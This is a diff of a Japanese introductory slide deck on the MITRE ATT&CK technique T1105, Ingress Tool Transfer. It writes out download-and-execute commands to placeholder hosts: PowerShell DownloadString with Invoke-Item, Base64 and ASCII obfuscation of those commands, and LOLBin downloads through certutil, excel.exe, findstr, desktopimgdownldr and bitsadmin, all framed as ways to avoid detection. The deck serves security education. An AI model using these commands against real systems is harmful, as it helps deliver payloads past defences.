--- a/T1105.md
+++ b/T1105.md
@@ -8,7 +8,7 @@ style: |
         font-size: 1.8em;
     }
     tr,th,td {
-        font-size: 16pt;
+        font-size: 20pt;
     }
     a {
         font-size: 12pt
@@ -19,34 +19,45 @@ style: |
         padding: 0em;
     }
 ---
-<!-- header: MITRE ATT&CK T1105 Ingress Tool Transfer -->
-<!-- $footer: MITRE ATT&CK T1105 Ingress Tool Transfer -->
+<!-- _footer: May,2021 https://github.com/x270/MITRE -->
 <!-- size:  4:3 -->
-<!-- _class: lead -->
-# T1105
-# Ingress Tool Transfer
+<!-- _class: invert -->
+# MITRE ATT&CK 101
+# T1105 Ingress Tool Transfer
 
 ---
+<!-- header: MITRE ATT&CK 101 /  T1105 Ingress Tool Transfer -->
 <!-- paginate: true -->
 <!-- page_number: true -->
-
 ### 超概要
-攻撃者は、使用するツールを標的に送り込む必要がある。
+攻撃用のツールを標的に送り込む。
 
 ---
-### 目的
-攻撃者は標的システムへのアクセス後、  
-目的を達成するためのアクションを実行する。  
-
-使用するツールを侵害されたネットワークへ  
-持ち込むために`Ingress Tool Transfer`を利用。
+### 超概要
+5W1h|???
+---|---
+When | 標的システムへアクセスできた後で
+Who | 攻撃者が
+Why | 目的を達成するため
+How |  あの手この手で
+Where | 標的システムの外から/中から
+What | 標的システムにツールを持ち込む
 
 ---
+<!--_footer : https://attack.mitre.org/techniques/T1105/ -->
+### MITRE ATT&CK上の定義
+> 攻撃者は、ツールやその他のファイルを外部システムから侵害された環境に転送する可能性がある。
+ファイルはC2チャンネルを介して外部の攻撃者が制御するシステムからコピーして、ツールを被害者のネットワークに持ち込むか、FTPなどの別のツールを使用した代替プロトコルを介してコピーできる。
+scp、rsync、sftpなどのネイティブツールを使用してMacおよびLinuxにファイルをコピーすることもできる。
+
+
+---
+<!--_footer : https://attack.mitre.org/techniques/T1105/ -->
 ### 分類
 
-
-| ID | T1105 |
+| 項目 | 説明 |
 | :--- | :--- |
+| ID | T1105 |
 | サブテクニック | なし |
 | 戦術 | コマンドアンドコントロール |
 | プラットフォーム | Linux、Windows、macOS |
@@ -54,23 +65,21 @@ style: |
 | データソース | ファイル<br>・ファイルの作成<br>ネットワークトラフィック<br>・ネットワーク接続の作成<br>・ネットワークトラフィックコンテンツ<br>・ネットワークトラフィックフロー |
 
 ---
-
+<!-- _footer : https://attack.mitre.org/ -->
 ### MATRICES
 ![height:560](./img/MITRE_T1105.png)
 
 ---
-### 定義
-> 攻撃者は、ツールやその他のファイルを外部システムから侵害された環境に転送する可能性がある。
-ファイルはC2チャンネルを介して外部の攻撃者が制御するシステムからコピーして、ツールを被害者のネットワークに持ち込むか、FTPなどの別のツールを使用した代替プロトコルを介してコピーできる。
-scp、rsync、sftpなどのネイティブツールを使用してMacおよびLinuxにファイルをコピーすることもできる。
-
----
-### How to Ingress Tool Transfer?
+### ツールを標的に送り込むには
 - **Push**
-対象の外部からファイルを送り込む
+標的の外からファイルを送り込む
 
 - **Pull**
-対象の内部操作で、外部からファイルを取得する
+標的の内部操作で、外からファイルを取得する
+
+---
+<!-- _class: invert -->
+# 基本的な方法
 
 ---
 ### Push - Linux/macOS
@@ -133,38 +142,28 @@ Set-Location $datePath
 certutil -verifyctl -split -f {remote_file}
 Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination {local_path} }
 ```
-
----
-### Pull - Windows
-**BITSAdmin**
-```bat
-C:\Windows\System32\bitsadmin.exe /transfer {bits_job_name} /Priority HIGH {remote_file} {local_path}
-```
-
 **DownloadString**
 ```ps1
-PS C:\> (New-Object Net.WebClient).DownloadString('https://example.com/index.html') | Out-File hoge.txt; Invoke-Item hoge.txt
+PS C:\> (New-Object Net.WebClient).DownloadString('https://example.com/index.html') 
+| Out-File hoge.txt; Invoke-Item hoge.txt
 ```
 
 ---
-<!-- _footer : https://binary-pulsar.hatenablog.jp/entry/2018/09/14/000000 -->
+<!-- _class: invert -->
+# 少し巧妙な方法①
+
+- 素人目にも何やってるか分かる実行方法は避けたい
+- 難読化により、不正検知を避けられる可能性が上がる。
+
+---
 ### Base64によるPowerShell難読化
-WindowsはUnicodeを標準としているため、実行するコマンドの文字列をUnicodeのバイト列に変換してからBase64エンコードする。
+
+以下2つはファイルを取ってきて実行する同じ内容。
 
 ```ps1
-PS C:\> $command = "(New-Object Net.WebClient).DownloadString('https://example.com/index.html')
- | Out-File hoge.txt; Invoke-Item hoge.txt"
-PS C:\> $unicodeBytes = [System.Text.Encoding]::Unicode.GetBytes($command)
-PS C:\> [System.Convert]::ToBase64String($unicodeBytes)
-KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBE
-AG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0A
-LwBpAG4AZABlAHgALgBoAHQAbQBsACcAKQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIABoAG8AZwBlAC4AdAB4AHQAOwAg
-AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgAGgAbwBnAGUALgB0AHgAdAA=
+PS C:\> (New-Object Net.WebClient).DownloadString('https://example.com/index.html')
+| Out-File hoge.txt; Invoke-Item hoge.txt
 ```
-
----
-### Base64によるPowerShell難読化 - 実行例
-PowerShell
 ```ps1
 PS C:\> powershell.exe -enc
 KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBE
@@ -173,18 +172,41 @@ LwBpAG4AZABlAHgALgBoAHQAbQBsACcAKQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIABoAG8AZwBlAC4A
 AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgAGgAbwBnAGUALgB0AHgAdAA=
 ```
 
-cmd
-```
-cmd.exe /c "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -enc
+---
+<!-- _footer : https://binary-pulsar.hatenablog.jp/entry/2018/09/14/000000 -->
+### Base64によるPowerShell難読化（作成）
+WindowsはUnicodeを標準としている。  
+実行するコマンドの文字列をUnicodeのバイト列に変換し、そのあとでBase64エンコードする。
+
+```ps1
+PS C:\> $command = "(New-Object Net.WebClient).DownloadString('https://example.com/index.html')
+| Out-File hoge.txt; Invoke-Item hoge.txt"
+
+PS C:\> $unicodeBytes = [System.Text.Encoding]::Unicode.GetBytes($command)
+
+PS C:\> [System.Convert]::ToBase64String($unicodeBytes)
+
 KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBE
 AG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0A
 LwBpAG4AZABlAHgALgBoAHQAbQBsACcAKQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIABoAG8AZwBlAC4AdAB4AHQAOwAg
-AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgAGgAbwBnAGUALgB0AHgAdAA="
+AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgAGgAbwBnAGUALgB0AHgAdAA=
+```
+
+---
+### ASCIIコードによるPowerShell難読化
+
+以下2つは`whoami`を実行する同じ内容。
+
+```ps1
+PS C:\> whoami
+```
+```ps1
+PS C:\> powershell.exe (((119, 104, 111, 97, 109, 105) | %{ ([Int]$_ -as [char]) }) -Join '')
 ```
 
 ---
 <!-- _footer : https://binary-pulsar.hatenablog.jp/entry/2018/09/01/000000 -->
-### ASCIIコードによるPowerShell難読化
+### ASCIIコードによるPowerShell難読化（作成）
 
 任意のコマンド`whoami`を1文字ずつASCIIコードに変換。
 ```ps1
@@ -196,27 +218,35 @@ AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgAGgAbwBnAGUALgB0AHgAdAA="
 ```
 得られた結果を変換、結合するコードを作成。
 ```ps1
-powershell (((119, 104, 111, 97, 109, 105) | %{ ([Int]$_ -as [char]) }) -Join '')
+powershell.exe (((119, 104, 111, 97, 109, 105) | %{ ([Int]$_ -as [char]) }) -Join '')
 ```
 
+---
+<!-- _class: invert -->
+# 少し巧妙な方法②
 
-
+- scpやsftpでは、素人目にもファイル転送だとバレる。
+- 不正検知されやすいし、実行自体が禁止されてるかも。
+- それっぽくないコマンドを活用して標的内から**Pull**する。
 
 ---
 ### LOLBin / LOLBaS
 
+scpやsftpなど、分かりやすいコマンドは使いたくないが、  
 侵入時点の標的上には攻撃者の独自ツールは存在しない。  
-OS標準で存在しているシステムツールをまずは使用する。
 
+そこで、
+OSに標準的に存在しているシステムツールを活用する。
 **LOLBin**：Living Off the Land Binary
 **LOLBaS**：Living Off the Land Binary and Script
 
-**LOLBAS-Project** https://lolbas-project.github.io/
-Windowsの標準的なコマンドによるDownload, Upload, Execute, Copyなどの手法がまとめられている。
+**LOLBAS-Project** https://lolbas-project.github.io/ :
+Windowsの標準的なコマンドによるDownloadのほか、  
+Upload, Execute, Copyなどの手法がまとめられている。
 
 ---
 <!-- _footer: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ -->
-### excel.exeによるファイルダウンロード
+### LOLBinの例1 - excel.exe
 
 excel：Microsoft Excelを起動するコマンド
 
@@ -224,35 +254,69 @@ excel：Microsoft Excelを起動するコマンド
 excel.exe http://example.com/hoge.dll
 ```
 
-ファイルはExcel上で読み取り専用で開くが、  
+Excel上で読み取り専用でファイルが開くだけに見えるが、  
 ローカルの所定のフォルダにキャッシュとして保存される。
 
-Excelを使用することで実行可能ソフトのホワイトリストを回避し、ペイロードをダウンロードすることが可能。
+キャッシュ先のパスはある程度特定できるため、  
+ダウンロード後の実行や他パスへの移動が可能。
 
-
-詳しい手法は下記を参照。
-[Unsanitized file validation leads to Malicious payload download via Office binaries. | by Reegun J | Medium](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)
-
+ダウンロード後の詳しい手法は下記を参照。
+[Unsanitized file validation leads to Malicious payload download via Office binaries. 
+| by Reegun J | Medium](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)
 
 ---
 <!-- _footer: https://lolbas-project.github.io/lolbas/Binaries/Findstr/ -->
-### findstr.exeによるファイルダウンロード
+### LOLBinの例2 - findstr.exe
 
 findstr：ファイル内を正規表現で検索するコマンド
 
 ```cmd
 findstr /V /L hogehoge \\servername\\file.exe > c:\work\work.exe
 ```
-/V：指定した文字列を**含まない行**をすべて表示
-/L：検索文字列をリテラルとして使用する
+**/V**：指定した文字列を**含まない行**をすべて表示
+**/L**：検索文字列をリテラルとして使用する
 
 結果、検索条件を含む行が1つも存在しないため、  
-元と同じ内容のwork.exeが任意のパスにコピーされる。
+元と同じ内容のファイルが任意のパスにコピーされる。
 
 ※ HTTPプロトコルでのダウンロードには対応していない。
 
 ---
-### 補足
+<!-- _footer: https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/ -->
+### LOLBinの例3 - desktopimgdownldr.exe
+
+desktopimgdownldr：壁紙をDLして所定のフォルダに置く
+```cmd
+set "SYSTEMROOT=C:\Windows\Temp" && 
+cmd /c desktopimgdownldr.exe /lockscreenurl:https://example.com/file.ex 
+/eventName:desktopimgdownldr
+```
+
+標準設定では、所定のフォルダは管理者権限でしかアクセスできないが、環境変数%systemroot%を書き換えることでユーザ権限でも実行できてしまう。
+
+通信が当該exeでなく、svchostから発生するのもポイント。
+
+日本語での詳しい解説は下記を参照。
+[desktopimgdownldrを使ったLOLBin手法の検証](https://kataware.hatenablog.jp/entry/2020/07/05/132057)
+
+---
+<!-- _footer : https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ -->
+### LOLBinの例4 - bitsadmin.exe
+bitsadmin : ジョブの作成やダウンロード、進行状況の監視
+```bat
+bitsadmin /transfer NewJobX http://example.com/x c:\temp\x.exe
+```
+
+ジョブの作成ができるので、ダウンロードに留まらず  
+実行なども当然できる。
+
+
+---
+<!-- _class: invert -->
+# 余談
+
+---
+### 余談
 **T1105**は、MITRE ATT&CK v6.3まで  
 「Remote FileCopy」だった。
 
@@ -264,23 +328,29 @@ https://attack.mitre.org/versions/v6/techniques/T1105/
 
 | Title | TACTIC |
 | :--- | :--- |
-| Remote File Copy | Command And Control, Lateral Movement |
+| Remote File Copy | Command And Control, <br>Lateral Movement |
 | Ingress Tool Transfer | Command And Control |
 
 ---
 ### 「Remote FileCopy」の定義（前半）
+    前半はほぼ変わり無し。
+
 > あるシステムから別のシステムへファイルをコピーし、攻撃用ツールやその他のファイルを配置することができる。
 ファイルは、攻撃者が制御する外部のシステムからC2チャンネルを介してコピーし、被害者のネットワークにツールを持ち込むか、FTPなどの別のツールを使用した代替プロトコルを介してコピーできる。
 scp、rsync、sftpなどのネイティブツールを使用してMacおよびLinuxにファイルをコピーすることもできる。
 
+
 ---
 ### 「Remote FileCopy」の定義（後半）
+    後半はIngress Tool Transferでは無いことにされた。
+
 > 攻撃者は被害者の内部システム間でファイルを横方向にコピーし、SMBを介して接続された共有ネットワークによるファイル共有や、Windows管理共有またはRDPの認証済み接続などの固有のファイル共有プロトコルを使用したり、リモート実行による横方向の移動も対応することができる。
 
-`Ingress Tool Transfer`になって、この部分が無くなった。
 
 ---
+<!-- _class : invert -->
 ### 参考
+（本文中でリンクを張ったものを除く）
 - [Ingress Tool Transfer, Technique T1105 - Enterprise | MITRE ATT&CK®](https://attack.mitre.org/techniques/T1105/)
 - [MITRE ATT&CK® 頻出手口 トップ10（2020年度下期）: NECセキュリティブログ | NEC](https://jpn.nec.com/cybersecurity/blog/210402/index.html)
 - [ATT&CK with Sub-Techniques — What You Need to Know | by Blake Strom | MITRE ATT&CK® | Medium](https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b)
@@ -289,4 +359,3 @@ scp、rsync、sftpなどのネイティブツールを使用してMacおよびLi
 - [atomic-red-team/T1105.md at master · redcanaryco/atomic-red-team](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md)
 - [PowerShell難読化の基礎 (3) - Binary Pulsar](https://binary-pulsar.hatenablog.jp/entry/2018/09/14/000000)
 - [Living Off The Land Binaries and Scripts (and also Libraries)](https://lolbas-project.github.io/)
-- [GTFOBins](https://gtfobins.github.io/)
